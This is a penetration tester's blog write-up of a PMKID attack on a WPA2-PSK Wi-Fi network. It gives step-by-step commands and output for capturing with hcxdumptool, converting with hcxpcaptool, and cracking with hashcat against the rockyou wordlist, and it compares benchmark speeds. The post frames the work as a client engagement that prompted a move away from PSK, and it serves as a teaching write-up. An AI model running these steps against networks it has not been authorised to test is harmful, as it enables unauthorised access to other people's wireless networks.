PMKID Attack Using Hckdumptool and Hashcat

While it's a bit older, I recently pulled off a PMKID attack and wanted to share the steps.

PMKID Attack - Introduction

I've you've never heard of the PMKID attack, then I recommend reading the original hashcat post.

This is a client-less attack, that doesn't need a 4-way handshake or special output format.

For another walkthrough, you can also visit the following post.

Targeting the Network

First, you will need to use hcxdumptool to capture the WLAN traffic. Note that not all drivers are working out of the box, but the following is a list of recommended chipsets.

  • USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
  • USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
  • USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
  • USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
  • USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Note that I performed this attack with a different card, but you will need to do some additional setup.

PMKID - Alfa AC1200

root@kali:~# lsusb
Bus 004 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

With my Alfa card in monitor mode, I was ready to begin.

root@kali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

First, I used airodump to grab the BSSID of my target network.

 CH  6 ][ Elapsed: 48 s ][ 2019-02-26 13:00                                         
                                                                                                          
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                       
                                                                                                          
 18:31:xx:xx:xx:xx  -67  17      266        0    0   6  130  WPA2 CCMP   PSK  TARGETNETWORK   

Once I obtained the BSSID, I added it to a filter file. While more than one BSSID can exist in this file, I was only targeting this specific network.

root@kali:~# echo "18xxxxxxxxxx" > myfilter.txt

Performing the Attack

With my filter in place, I could now use hcxdumptool to collect packets.

I was ablw to capture a PMKID hash very quickly, which was awesome!

root@kali:~# hcxdumptool -o capture.pcap -i wlan0 --enable_status=1 --filterlist=myfilter.txt
initialization...

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: dc701431xxxx
MAC ACCESS POINT.........: 48f317b472b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65198
ANONCE...................: 7281156220ed9e68c9f974df2f98d10b7c800270b49e1004ad5dc1ad3e2662b0

[13:07:58 - 006] 841b5ee0xxxx -> a04ea7a4xxxx [FOUND PMKID]

Next, I used hcxpcaptool to convert the hash into a usable format.

root@kali:~# hcxpcaptool -z pmkid_hash.txt capture.pcap 

reading from capture.pcap
                                                
summary:                                        
--------
file name....................: capture.pcap
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.19.0-kali1-686-pae
file application information.: hcxdumptool 5.1.3
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 88
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 88
beacons (with ESSID inside)..: 9
probe requests...............: 14
probe responses..............: 11
association requests.........: 7
association responses........: 7
authentications (OPEN SYSTEM): 38
authentications (BROADCOM)...: 22
authentications (APPLE)......: 4
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to pmkid_hash.txt

Cracking the Hash

To crack these hashes using hashcat, you will need at least version 4.2.0.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat --version
v4.2.1

After verifying that I had an updated version, I set to cracking the hash.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -r ~/tools/cracking/best64.rule pmkid_hash.txt ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxx*84xxxxxxxxxx*axxxx...6xxxxx
Time.Started.....: Tue Feb 26 14:17:20 2019 (28 secs)
Time.Estimated...: Tue Feb 26 18:57:06 2019 (4 hours, 39 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5477 H/s (7.38ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Speed.Dev.#3.....:    59229 H/s (8.04ms) @ Accel:32 Loops:16 Thr:256 Vec:1
Speed.Dev.#*.....:    64706 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20165670/1104517568 (1.83%)
Rejected.........: 18445350/20165670 (91.47%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> Iloveyou85
Candidates.#3....: iloveyou348 -> footiecrazy8

Unfortunately, I was unable to crack the hash in this specific scenario. That said, I was able to prove the vulnerability and convince them to switch away from PSK.

In light of a fun screenshot of me able to connect, I give you a picture of my co-worker's awesome antenna

PMKID - 20dBi Antenna

I also wanted to point out that cracking the PMKID hashes is around twice as fast as standard EAPOL packets! This makes the attack even more enticing, as WPA2 is a notoriously slow algorithm.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6631 H/s (53.86ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    59876 H/s (66.06ms) @ Accel:128 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    66507 H/s

Started: Thu Feb 28 16:05:21 2019
Stopped: Thu Feb 28 16:05:31 2019
Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 2500 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6634 H/s (53.85ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    26169 H/s (75.92ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    32803 H/s

Started: Thu Feb 28 16:05:36 2019
Stopped: Thu Feb 28 16:05:44 2019

PMKID Attack - Conclusion

While I wasn't able to perform a complete compromise, this was still an awesome attack to do. I definitely plan on using, as well as researching, it further.

Note that EAPHammer can also do this attack, and I may share a post with that technique as well.

If you have any other suggestions for wireless gear or techniques that I should try, then please reach out!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.